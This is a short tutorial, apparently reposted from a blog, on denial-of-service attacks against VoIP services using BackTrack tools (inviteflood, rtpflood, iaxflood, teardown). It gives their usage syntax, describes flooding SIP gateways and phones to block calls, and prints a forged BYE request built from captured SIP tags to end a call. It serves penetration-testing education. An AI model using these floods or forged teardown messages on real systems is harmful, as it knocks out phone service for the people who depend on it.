A denial of service attack on VoIP services can render it useless by causing an intentionally damage to the network and VoIP systems availability. This attack can occur on two levels, standard network dos attacks and VoIP specific dos attacks. Generally we will send tons of data by flooding the network to consume all its resources or a specific protocol in order to overwhelm it with tons of requests. Let’s take a quick overview of the tools available in Backtrack
Inviteflood
This tool can be used to flood a target with INVITE requests it can be used to target sip gateways/proxies and sip phones.
root@bt:/pentest/voip/inviteflood# ./inviteflood
inviteflood - Version 2.0
June 09, 2006
Usage:
Mandatory -
interface (e.g. eth0)
target user (e.g. "" or john.doe or 5000 or "1+210-555-1212")
target domain (e.g. enterprise.com or an IPv4 address)
IPv4 addr of flood target (ddd.ddd.ddd.ddd)
flood stage (i.e. number of packets)
Optional -
-a flood tool "From:" alias (e.g. jane.doe)
-i IPv4 source IP address [default is IP address of interface]
-S srcPort (0 - 65535) [default is well-known discard port 9]
-D destPort (0 - 65535) [default is well-known SIP port 5060]
-l lineString line used by SNOM [default is blank]
-s sleep time btwn INVITE msgs (usec)
-h help - print this usage
-v verbose output mode
A basic usage syntax looks like this: ./inviteflood eth0 target_extension target_domain target_ip number_of_packets
As long the tool keeps flooding the sip gateway it will prevent users from making phone calls. You can flood the sip proxy with an inexistent extension thus making it generating a 404 not found just to keep it busy.
Rtpflood
Rtp flood is used to flood a target IP phone with a UDP packet contains a RTP data In order to launch a successful attack using rtpflood you will need know the RTP listening port on the remote device you want to attack, for example; x-lite sofphone default rtp port is 8000.
root@bt:/pentest/voip/rtpflood# ./rtpflood
usage: ./rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID
Iaxflood
IAXFlood is a tool for flooding the IAX2 protocol which is used by the Asterisk PBX.
root@bt:/pentest/voip/iaxflood# ./iaxflood
usage: ./iaxflood sourcename destinationname numpackets
Teardown
Teardown is used to terminate a call by sending a bye request
./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag
First you will need to capture a valid sip OK response and use its from and to tags and a valid caller id value. SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.105;branch=z9hG4bKkfnyfaol;received=192.168.1.105;rport=5060
From: "200" ;tag=hcykd
To: "200" ;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 134 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Expires: 3600
Contact: ;expires=3600
Date: Tue, 01 Feb 2011 17:55:42 GMT
Content-Length: 0
If you specify the “-v” option you can see the payload:
SIP PAYLOAD for packet:
BYE sip:200@192.168.1.104:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.105:9;branch=91ca1ba5-98ee-44d5-9170-61c30981c565
From: <sip:192.168.1.104>;tag=hcykd
To: 200 <sip:200@192.168.1.104>;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 2000000000 BYE
Max-Forwards: 16
User-Agent: Hacker
Content-Length: 0
Contact: <sip:192.168.1.105:9>
Sumber http://hoznimonzter.blogspot.com